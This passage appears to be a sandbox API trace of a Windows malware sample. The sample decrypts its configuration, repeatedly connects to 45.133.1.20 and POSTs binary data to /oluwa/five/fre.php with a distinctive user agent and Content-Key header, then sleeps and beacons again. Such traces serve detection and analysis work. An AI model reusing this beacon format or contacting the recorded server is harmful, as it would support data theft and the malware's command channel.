returned 1 [0272.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.754] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0272.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.755] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.760] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0272.761] GetProcessHeap () returned 0x6a0000 [0272.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.765] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.767] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.771] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.775] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.775] GetProcessHeap () returned 0x6a0000 [0272.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0272.776] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.776] GetProcessHeap () returned 0x6a0000 [0272.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0272.777] GetProcessHeap () returned 0x6a0000 [0272.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.777] GetProcessHeap () returned 0x6a0000 [0272.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0272.778] GetProcessHeap () returned 0x6a0000 [0272.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0272.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.779] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0272.798] GetProcessHeap () returned 0x6a0000 [0272.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.800] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0272.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.801] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.803] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.803] GetProcessHeap () returned 0x6a0000 [0272.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.805] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0272.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.809] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0272.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.810] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0272.810] GetProcessHeap () returned 0x6a0000 [0272.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.812] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0272.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.813] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0272.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.814] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0272.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.815] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0272.815] GetProcessHeap () returned 0x6a0000 [0272.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0272.815] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0272.819] GetProcessHeap () returned 0x6a0000 [0272.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0272.819] socket (af=2, type=1, protocol=6) returned 0x9ac [0272.819] connect (s=0x9ac, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0272.846] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0272.846] GetProcessHeap () returned 0x6a0000 [0272.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0272.846] GetProcessHeap () returned 0x6a0000 [0272.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0272.848] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.853] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0272.853] GetProcessHeap () returned 0x6a0000 [0272.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0272.853] GetProcessHeap () returned 0x6a0000 [0272.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.854] GetProcessHeap () returned 0x6a0000 [0272.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0272.854] GetProcessHeap () returned 0x6a0000 [0272.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0272.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0272.856] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0272.856] GetProcessHeap () returned 0x6a0000 [0272.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0272.856] GetProcessHeap () returned 0x6a0000 [0272.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0272.856] send (s=0x9ac, buf=0x6bd460*, len=242, flags=0) returned 242 [0272.857] send (s=0x9ac, buf=0x6bb998*, len=159, flags=0) returned 159 [0272.857] GetProcessHeap () returned 0x6a0000 [0272.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0272.857] recv (in: s=0x9ac, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0272.941] GetProcessHeap () returned 0x6a0000 [0272.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0272.942] GetProcessHeap () returned 0x6a0000 [0272.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0272.942] GetProcessHeap () returned 0x6a0000 [0272.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0272.943] GetProcessHeap () returned 0x6a0000 [0272.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0272.943] closesocket (s=0x9ac) returned 0 [0272.944] GetProcessHeap () returned 0x6a0000 [0272.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0272.944] GetProcessHeap () returned 0x6a0000 [0272.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.944] GetProcessHeap () returned 0x6a0000 [0272.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0272.945] GetProcessHeap () returned 0x6a0000 [0272.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0272.945] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x173c) returned 0x9ac [0272.948] Sleep (dwMilliseconds=0xea60) [0272.950] GetProcessHeap () returned 0x6a0000 [0272.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0272.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.951] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.962] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0272.972] GetProcessHeap () returned 0x6a0000 [0272.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0272.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.974] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0272.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.976] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0272.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.977] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0272.977] GetProcessHeap () returned 0x6a0000 [0272.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0272.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.979] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0272.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.980] CryptDestroyKey (hKey=0x6ad560) returned 1 [0272.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.984] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0272.984] GetProcessHeap () returned 0x6a0000 [0272.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0272.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.985] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0272.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.986] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0272.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.987] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0272.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0272.988] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0272.988] GetProcessHeap () returned 0x6a0000 [0272.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0272.988] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0272.988] GetProcessHeap () returned 0x6a0000 [0272.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0272.988] GetProcessHeap () returned 0x6a0000 [0272.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0272.989] GetProcessHeap () returned 0x6a0000 [0272.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0272.989] GetProcessHeap () returned 0x6a0000 [0272.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0272.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0272.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0272.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0273.006] GetProcessHeap () returned 0x6a0000 [0273.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.007] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0273.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.009] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.010] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.010] GetProcessHeap () returned 0x6a0000 [0273.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.012] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0273.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.017] CryptDestroyKey (hKey=0x6ad020) returned 1 [0273.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.018] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0273.018] GetProcessHeap () returned 0x6a0000 [0273.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.019] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0273.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.026] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0273.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.027] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0273.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.028] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0273.029] GetProcessHeap () returned 0x6a0000 [0273.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0273.029] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0273.029] GetProcessHeap () returned 0x6a0000 [0273.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0273.029] socket (af=2, type=1, protocol=6) returned 0x9b0 [0273.029] connect (s=0x9b0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0273.061] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0273.061] GetProcessHeap () returned 0x6a0000 [0273.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0273.062] GetProcessHeap () returned 0x6a0000 [0273.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0273.063] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.064] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0273.064] GetProcessHeap () returned 0x6a0000 [0273.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ff0 [0273.064] GetProcessHeap () returned 0x6a0000 [0273.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.064] GetProcessHeap () returned 0x6a0000 [0273.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0273.065] GetProcessHeap () returned 0x6a0000 [0273.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0273.065] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.066] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0273.066] GetProcessHeap () returned 0x6a0000 [0273.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0273.066] GetProcessHeap () returned 0x6a0000 [0273.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.067] send (s=0x9b0, buf=0x6bd460*, len=242, flags=0) returned 242 [0273.068] send (s=0x9b0, buf=0x6bb998*, len=159, flags=0) returned 159 [0273.068] GetProcessHeap () returned 0x6a0000 [0273.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0273.068] recv (in: s=0x9b0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0273.198] GetProcessHeap () returned 0x6a0000 [0273.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0273.198] GetProcessHeap () returned 0x6a0000 [0273.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0273.199] GetProcessHeap () returned 0x6a0000 [0273.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ff0 | out: hHeap=0x6a0000) returned 1 [0273.199] GetProcessHeap () returned 0x6a0000 [0273.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0273.199] closesocket (s=0x9b0) returned 0 [0273.200] GetProcessHeap () returned 0x6a0000 [0273.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0273.200] GetProcessHeap () returned 0x6a0000 [0273.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.201] GetProcessHeap () returned 0x6a0000 [0273.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0273.201] GetProcessHeap () returned 0x6a0000 [0273.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0273.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1744) returned 0x9b0 [0273.204] Sleep (dwMilliseconds=0xea60) [0273.206] GetProcessHeap () returned 0x6a0000 [0273.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0273.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0273.231] GetProcessHeap () returned 0x6a0000 [0273.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.233] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0273.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.234] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.235] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.235] GetProcessHeap () returned 0x6a0000 [0273.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.237] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0273.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.239] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0273.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.244] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0273.244] GetProcessHeap () returned 0x6a0000 [0273.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.245] StrStrA 